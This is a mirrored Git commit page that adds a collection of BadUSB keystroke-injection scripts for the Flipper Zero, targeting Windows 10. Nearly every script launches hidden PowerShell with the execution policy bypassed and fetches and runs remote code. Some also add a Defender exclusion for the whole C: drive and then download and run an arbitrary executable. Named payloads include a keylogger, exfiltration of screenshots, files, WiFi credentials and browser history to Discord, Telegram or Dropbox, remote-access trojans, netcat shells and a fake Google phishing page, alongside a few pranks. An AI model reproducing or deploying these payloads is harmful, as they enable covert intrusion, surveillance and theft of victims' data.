gitea-mirror/BadUSB-Files-For-FlipperZero
1
0
Fork 0
mirror of https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git synced 2025-12-25 20:34:28 -08:00
Code Issues Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
beigeworm
2023-07-17 15:43:57 +00:00
committed by GitHub
parent 74b4b2e581
commit 4649c960e1
27 changed files with 537 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

22
Fast-Execution-Scripts/Add-Defender-Exclusion.txt Normal file
View File

@@ -0,0 +1,22 @@
REM Title: Add Windows Defender Exclusion
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Add Windows Defender Exclusion for C:/ drive.
REM Target: Windows 10
REM *SETUP*
REM replace FILE_URL_HERE with the url of your file to run.
REM some setup for dukie script.
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C Add-MpPreference -ExclusionPath C:/
REM replace FILE_URL_HERE below.
STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit
CTRL-SHIFT ENTER
DELAY 3000
ALT y

19
Fast-Execution-Scripts/Browser-History-to-Discord.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: beigeworm's browser history to Discord Webhook.
REM Author: @beigeworm
REM Description: This script collects browser history and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Brwsr-Hist.ps1 | iex
ENTER

16
Fast-Execution-Scripts/Desktop-Shortcut-Spam.txt Normal file
View File

@@ -0,0 +1,16 @@
REM Title: beigeworm's Desktop Shortcut Spammer.
REM Author: @beigeworm
REM Description: This script creates 100 shortcuts on the users Desktop.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Lnk-Spam.ps1 | iex
ENTER

19
Fast-Execution-Scripts/Discord-Image-spam.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: beigeworm's Spam blank image to Discord Webhook.
REM Author: @beigeworm
REM Description: This script sends a blank image to a discord webhook 25 times.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/DCimg-spam.ps1 | iex
ENTER

19
Fast-Execution-Scripts/Discord-WiFi-Grabber.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: beigeworm's saved WiFi to Discord Webhook.
REM Author: @beigeworm
REM Description: This script collects saved WiFi info and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/DC-WiFi-Grab.ps1 | iex
ENTER

22
Fast-Execution-Scripts/Download-Execute.txt Normal file
View File

@@ -0,0 +1,22 @@
REM Title: Download-Execute from Run Prompt
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses the Run Prompt to download a file and run it.
REM Target: Windows 10
REM *SETUP*
REM replace FILE_URL_HERE with the url of your file to run.
REM some setup for dukie script.
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:/;Start-Sleep 1;
REM replace FILE_URL_HERE below.
STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit
CTRL-SHIFT ENTER
DELAY 3000
ALT y

20
Fast-Execution-Scripts/Exfil-to-Dropbox.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: beigeworm's Exfiltrate files to Dropbox
REM Author: @beigeworm
REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account.
REM Target: Windows 10
REM *SETUP*
REM replace DDROPBOX_TOKEN with your Dropbox Token.
REM for setup instructions visit - https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Discord%20Scripts/Exfiltrate%20to%20Dropbox.ps1
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Exfil-to-Dropbox.ps1 | iex
ENTER

20
Fast-Execution-Scripts/File-Changes-to-Discord.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: beigeworm's monitor file changes to Discord Webhook.
REM Author: @beigeworm
REM Description: This script monitors any file changes in the USERPROFILE directory and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/FileAC-to-DC.ps1 | iex
ENTER

16
Fast-Execution-Scripts/Gif-Player.txt Normal file
View File

@@ -0,0 +1,16 @@
REM Title: beigeworm's GIF Player.
REM Author: @beigeworm
REM Description: This script changes downlaods a rick and morty GIF and plays it in a GUI window.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/GIF-Play.ps1 | iex
ENTER

20
Fast-Execution-Scripts/Google-Phishing-to-Discord.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: beigeworm's Fake Google Phishing page to Discord Webhook.
REM Author: @beigeworm
REM Description: This script makes a Fake Google Phishing page and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Google-Phish.ps1 | iex
ENTER

20
Fast-Execution-Scripts/Keylog-to-Discord.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: beigeworm's Keyloggger to Discord Webhook.
REM Author: @beigeworm
REM Description: This script logs all Keystrokes and posts results to a discord webhook every 5 mins.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Keylog-to-DC.ps1 | iex
ENTER

20
Fast-Execution-Scripts/Mouse-Activity-to-Discord.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: beigeworm's monitor mouse activity to Discord Webhook.
REM Author: @beigeworm
REM Description: This script monitors mouse activity and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/MouseAC-to-DC.ps1 | iex
ENTER

21
Fast-Execution-Scripts/Netcat-Client-w-Functions-(admin).txt Normal file
View File

@@ -0,0 +1,21 @@
REM Title: Beigeworm's Netcat Client with Extra Fuctions
REM Author: @beigeworm
REM Description: This script connects target computer with a netcat session to send powershell commands.
REM EXTRA FUNCTIONS - (to see extra functions type "options" once connected..)
REM Target: Windows 10
REM *SETUP*
REM replace IP_HERE with your netcat attacker IP Address.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/NC-Func.ps1 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y

20
Fast-Execution-Scripts/Netcat-Client-w-Functions.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: Beigeworm's Netcat Client with Extra Fuctions
REM Author: @beigeworm
REM Description: This script connects target computer with a netcat session to send powershell commands.
REM EXTRA FUNCTIONS - (to see extra functions type "options" once connected..)
REM Target: Windows 10
REM *SETUP*
REM replace IP_HERE with your netcat attacker IP Address.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/NC-Func.ps1 | iex
ENTER

20
Fast-Execution-Scripts/README.md Normal file
View File

@@ -0,0 +1,20 @@
# Downloadable-Ducky-Scripts-For-FlipperZero
**These scripts download scripts to run from this repo -**
https://github.com/beigeworm/assets/tree/main/Scripts
they all use this command > `powershell -NoP -Ep Bypass -W H -C $variable='USER_INPUT_HERE'; irm HOSTED_SCRIPT_URL_HERE | iex`
These scripts range from harmless pranks to nefarious red team tools. For educational purposes only!
**If you want to learn more about the code, or modify them, most of these scripts are in powershell format here**
https://github.com/beigeworm/Powershell-Tools-and-Toys
# Pre-Deployment Setup
Most of these scripts will require some setup before they will work.
# If you like my work please leave a star. ⭐

20
Fast-Execution-Scripts/Screenshot-to-Dropbox.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: beigeworm's Exfiltrate files to Dropbox
REM Author: @beigeworm
REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account.
REM Target: Windows 10
REM *SETUP*
REM replace DDROPBOX_TOKEN with your Dropbox Token.
REM for setup instructions visit - https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Discord%20Scripts/Exfiltrate%20to%20Dropbox.ps1
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/SShot-to-Dropbox.ps1 | iex
ENTER

20
Fast-Execution-Scripts/Screenshots-to-Discord.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: beigeworm's periodic Screenshots to discord webhook
REM Author: @beigeworm
REM Description: This script takes a screenshot of the deasktop every 5 mins and posts to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/SShots-to-DC.ps1 | iex
ENTER

20
Fast-Execution-Scripts/Simple-Netcat-Client-(admin).txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: Beigeworm's Simple Netcat Client
REM Author: @beigeworm
REM Description: This script connects target computer with a netcat session to send powershell commands.
REM Target: Windows 10
REM *SETUP*
REM replace IP_HERE with your netcat attacker IP Address.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/NC-Client.ps1 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y

19
Fast-Execution-Scripts/Simple-Netcat-Client.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: Beigeworm's Simple Netcat Client
REM Author: @beigeworm
REM Description: This script connects target computer with a netcat session to send powershell commands.
REM Target: Windows 10
REM *SETUP*
REM replace IP_HERE with your netcat attacker IP Address.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/NC-Client.ps1 | iex
ENTER

19
Fast-Execution-Scripts/Sys-Info-to-Discord.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: beigeworm's system information to discord webhook
REM Author: @beigeworm
REM Description: This script gathers system information and posts to a discord webhook address with the results.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Sys-Info-to-DC.ps1 | iex
ENTER

20
Fast-Execution-Scripts/Sys-Info-to-Telegram.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: beigeworm's system information to Telegram Bot
REM Author: @beigeworm
REM Description: This script gathers system information and posts to Telegram Bot Chat with the results.
REM for setup info on telegram bots see - https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Telegram%20and%20Dropbox%20Scripts/Simple%20Telegram%20RAT.ps1
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Sys-Info-to-TG.ps1 | iex
ENTER

23
Fast-Execution-Scripts/Telegram-RAT-(admin).txt Normal file
View File

@@ -0,0 +1,23 @@
REM Title: Beigeworm's Telegram RAT
REM Author: @beigeworm
REM Description: This script connects target computer with a telegram chat to send powershell commands
REM Target: Windows 10
REM *SETUP*
REM replace TELEGRAM_TOKEN with your telegram Bot token.
REM replace CHAT_ID with your telegram bot Chat ID.
( for instructions visit https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Telegram%20and%20Dropbox%20Scripts/Simple%20Telegram%20RAT.ps1 )
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/TG-RAT.ps1 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y

23
Fast-Execution-Scripts/Telegram-RAT-w-Functions-(admin).txt Normal file
View File

@@ -0,0 +1,23 @@
REM Title: Beigeworm's Telegram RAT with Extra Functions
REM Author: @beigeworm
REM Description: This script connects target computer with a telegram chat to send powershell commands.
REM EXTRA COMMANDS - (once connected type "options" to see a list of extra fuctions)
REM Target: Windows 10
REM *SETUP*
REM replace TELEGRAM_TOKEN with your telegram Bot token.
REM replace CHAT_ID with your telegram bot Chat ID.
( for instructions visit https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Telegram%20and%20Dropbox%20Scripts/Simple%20Telegram%20RAT.ps1 )
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/TG-RAT-Func.ps1 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y

22
Fast-Execution-Scripts/Telegram-RAT-w-Functions.txt Normal file
View File

@@ -0,0 +1,22 @@
REM Title: Beigeworm's Telegram RAT with Extra Functions
REM Author: @beigeworm
REM Description: This script connects target computer with a telegram chat to send powershell commands.
REM EXTRA COMMANDS - (once connected type "options" to see a list of extra fuctions)
REM Target: Windows 10
REM *SETUP*
REM replace TELEGRAM_TOKEN with your telegram Bot token.
REM replace CHAT_ID with your telegram bot Chat ID.
( for instructions visit https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Telegram%20and%20Dropbox%20Scripts/Simple%20Telegram%20RAT.ps1 )
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/TG-RAT-Func.ps1 | iex
ENTER

21
Fast-Execution-Scripts/Telegram-RAT.txt Normal file
View File

@@ -0,0 +1,21 @@
REM Title: Beigeworm's Telegram RAT
REM Author: @beigeworm
REM Description: This script connects target computer with a telegram chat to send powershell commands
REM Target: Windows 10
REM *SETUP*
REM replace TELEGRAM_TOKEN with your telegram Bot token.
REM replace CHAT_ID with your telegram bot Chat ID.
( for instructions visit https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Telegram%20and%20Dropbox%20Scripts/Simple%20Telegram%20RAT.ps1 )
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/TG-RAT.ps1 | iex
ENTER

19
Fast-Execution-Scripts/US-Keyboard.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: beigeworm's Keyboard Language changer.
REM Author: @beigeworm
REM Description: This script changes the keyboard layout and system language to US.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/US-keyboard.ps1 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y

17
Fast-Execution-Scripts/Wallpaper-Jumpscare.txt Normal file
View File

@@ -0,0 +1,17 @@
REM Title: beigeworm's Wallpaper Jump Scare.
REM Author: @beigeworm
REM Description: This script changes downlaods a scary image and sets it as a wallpaper.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/wallpaper.ps1 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y